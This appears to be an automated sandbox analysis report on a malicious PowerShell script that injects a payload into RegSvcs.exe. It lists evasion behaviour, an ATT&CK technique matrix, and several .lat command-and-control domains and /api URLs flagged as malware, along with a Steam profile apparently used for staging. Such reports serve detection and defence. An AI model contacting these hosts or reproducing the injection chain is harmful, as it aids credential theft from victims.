    Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2208766301.000001B544DE0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52DC85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348BBC8C pushad ; iretd 0_2_00007FFD348BBC8D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348BA8DC push ebx; retf 0_2_00007FFD348BA8DD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348BB20B pushad ; ret 0_2_00007FFD348BB20C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B4C00 push E8FFFFFFh; iretd 0_2_00007FFD348B4C0D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0043A6F5 push esi; retf 4_2_0043A6FE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh4_2_00441864
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3356Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3587Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3488Thread sleep time: -3689348814741908s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1136Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: RegSvcs.exe, 00000004.00000002.2195309528.0000000001451000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004402D0 LdrInitializeThunk,4_2_004402D0
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: finickypwk.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shoefeatthe.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: savorraiykj.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: kickykiduz.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: miniatureyu.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: leggelatez.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: washyceehsu.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: bloodyswif.lat
    Source: powershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: curtainykeo.lat
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 454000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 108D008Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    PowerShell
    1
    DLL Side-Loading
    211
    Process Injection
    21
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    211
    Process Injection
    LSASS Memory1
    Process Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin Shares3
    Clipboard Data
    2
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
    Obfuscated Files or Information
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture113
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    92.255.57_1.112.ps17%VirustotalBrowse
    92.255.57_1.112.ps18%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://kickykiduz.lat:443/api100%Avira URL Cloudmalware
    https://washyceehsu.lat:443/api100%Avira URL Cloudmalware
    https://finickypwk.lat:443/api100%Avira URL Cloudmalware
    https://shoefeatthe.lat:443/api100%Avira URL Cloudmalware
    curtainykeo.lat100%Avira URL Cloudmalware
    https://savorraiykj.lat:443/apisq100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truefalse
      high
      finickypwk.lat
      unknown
      unknowntrue
        unknown
        washyceehsu.lat
        unknown
        unknowntrue
          unknown
          kickykiduz.lat
          unknown
          unknowntrue
            unknown
            bloodyswif.lat
            unknown
            unknowntrue
              unknown
              shoefeatthe.lat
              unknown
              unknowntrue
                unknown
                savorraiykj.lat
                unknown
                unknowntrue
                  unknown
                  miniatureyu.lat
                  unknown
                  unknowntrue
                    unknown
                    curtainykeo.lat
                    unknown
                    unknowntrue
                      unknown
                      leggelatez.lat
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        bloodyswif.latfalse
                          high
                          curtainykeo.lattrue
                          • Avira URL Cloud: malware
                          unknown
                          washyceehsu.latfalse
                            high
                            leggelatez.latfalse
                              high
                              https://steamcommunity.com/profiles/76561199724331900false
                                high
                                kickykiduz.latfalse
                                  high
                                  savorraiykj.latfalse
                                    high
                                    miniatureyu.latfalse
                                      high
                                      finickypwk.latfalse
                                        high
                                        shoefeatthe.latfalse
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://player.vimeo.comRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://kickykiduz.lat:443/apiRegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.microsoft.copowershell.exe, 00000000.00000002.2183976241.000001B52C947000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Licensepowershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.gstatic.cn/recaptcha/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://finickypwk.lat:443/apiRegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://recaptcha.net/recaptcha/;RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.youtube.comRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.comRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://medal.tvRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://broadcast.st.dl.eccdnx.comRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://shoefeatthe.lat:443/apiRegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://contoso.com/powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://oneget.orgXpowershell.exe, 00000000.00000002.2184375332.000001B52E351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://s.ytimg.com;RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://login.steampowered.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbRegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2184375332.000001B52CAB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://community.fastly.steamstatic.com/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://steam.tv/RegSvcs.exe, 00000004.00000002.2196018587.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2199148467.000001B53CC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2184375332.000001B52E351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2184375332.000001B52CCD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://go.micropowershell.exe, 00000000.00000002.2184375332.000001B52DC85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://steamcommunity.com:443/profiles/76561199724331900RegSvcs.exe, 00000004.00000002.2195684340.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://contoso.com/Iconpowershell.exe, 00000000.00000002.2184375332.000001B52E597000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
